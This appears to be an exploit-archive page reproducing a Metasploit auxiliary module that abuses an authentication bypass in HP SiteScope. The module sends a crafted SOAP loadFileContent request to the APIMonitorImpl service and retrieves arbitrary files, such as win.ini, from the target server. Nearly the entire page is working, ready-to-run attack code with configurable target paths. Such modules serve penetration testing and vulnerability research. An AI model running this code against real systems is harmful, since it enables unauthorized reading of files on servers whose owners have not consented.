Lucene search

K
packetstormRgod, juan vazquez, metasploit.comPACKETSTORM:181132
HistorySep 01, 2024 - 12:00 a.m.

HP SiteScope SOAP Call LoadFileContent Remote File Access

2024-09-0100:00:00
rgod, juan vazquez, metasploit.com
packetstormsecurity.com
11
hp sitescope
soap
loadfilecontent
remote file access
authentication bypass
arbitrary text file
vulnerability
windows 2003
linux centos 6.3
metasploit
exploit

AI Score

7.4

Confidence

Low

`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Auxiliary  
include Msf::Exploit::Remote::HttpClient  
include Msf::Auxiliary::Report  
include Msf::Auxiliary::Scanner  
  
def initialize  
super(  
'Name' => 'HP SiteScope SOAP Call loadFileContent Remote File Access',  
'Description' => %q{  
This module exploits an authentication bypass vulnerability in HP SiteScope to  
retrieve an arbitrary text file from the remote server. It is accomplished by  
calling the loadFileContent operation available through the APIMonitorImpl AXIS  
service. This module has been successfully tested on HP SiteScope 11.20 over  
Windows 2003 SP2 and Linux Centos 6.3.  
},  
'References' =>  
[  
[ 'OSVDB', '85118' ],  
[ 'BID', '55269' ],  
[ 'ZDI', '12-177' ]  
],  
'Author' =>  
[  
'rgod <rgod[at]autistici.org>', # Vulnerability discovery  
'juan vazquez' # Metasploit module  
],  
'License' => MSF_LICENSE  
)  
  
register_options(  
[  
Opt::RPORT(8080),  
OptString.new('RFILE', [true, 'Remote File', 'c:\\windows\\win.ini']),  
OptString.new('TARGETURI', [true, 'Path to SiteScope', '/SiteScope/']),  
])  
  
register_autofilter_ports([ 8080 ])  
end  
  
def run_host(ip)  
@uri = normalize_uri(target_uri.path)  
@uri << '/' if @uri[-1,1] != '/'  
  
print_status("Connecting to SiteScope SOAP Interface")  
  
uri = normalize_uri(@uri, 'services/APIMonitorImpl')  
  
res = send_request_cgi({  
'uri' => uri,  
'method' => 'GET'})  
  
if not res  
print_error("Unable to connect")  
return  
end  
  
accessfile  
end  
  
def accessfile  
  
data = "<?xml version='1.0' encoding='UTF-8'?>" + "\r\n"  
data << "<wsns0:Envelope" + "\r\n"  
data << "xmlns:wsns1='http://www.w3.org/2001/XMLSchema-instance'" + "\r\n"  
data << "xmlns:xsd='http://www.w3.org/2001/XMLSchema'" + "\r\n"  
data << "xmlns:wsns0='http://schemas.xmlsoap.org/soap/envelope/'" + "\r\n"  
data << ">" + "\r\n"  
data << "<wsns0:Body" + "\r\n"  
data << "wsns0:encodingStyle='http://schemas.xmlsoap.org/soap/encoding/'" + "\r\n"  
data << ">" + "\r\n"  
data << "<impl:loadFileContent" + "\r\n"  
data << "xmlns:impl='http://Api.freshtech.COM'" + "\r\n"  
data << ">" + "\r\n"  
data << "<in0" + "\r\n"  
data << "xsi:type='xsd:string'" + "\r\n"  
data << "xmlns:xsi='http://www.w3.org/2001/XMLSchema-instance'" + "\r\n"  
data << ">#{datastore['RFILE']}</in0>" + "\r\n"  
data << "</impl:loadFileContent>" + "\r\n"  
data << "</wsns0:Body>" + "\r\n"  
data << "</wsns0:Envelope>" + "\r\n"  
  
print_status("Retrieving the file contents")  
  
uri = normalize_uri(@uri, 'services/APIMonitorImpl')  
  
res = send_request_cgi({  
'uri' => uri,  
'method' => 'POST',  
'ctype' => 'text/xml; charset=UTF-8',  
'data' => data,  
'headers' => {  
'SOAPAction' => '""',  
}})  
  
if res and res.code == 200 and res.body =~ /<loadFileContentReturn xsi:type="xsd:string">(.*)<\/loadFileContentReturn>/m  
loot = CGI.unescapeHTML($1)  
if not loot or loot.empty?  
print_status("Retrieved empty file")  
return  
end  
f = ::File.basename(datastore['RFILE'])  
path = store_loot('hp.sitescope.file', 'application/octet-stream', rhost, loot, f, datastore['RFILE'])  
print_good("#{datastore['RFILE']} saved in #{path}")  
return  
end  
  
print_error("Failed to retrieve the file")  
end  
end  
  
`

AI Score

7.4

Confidence

Low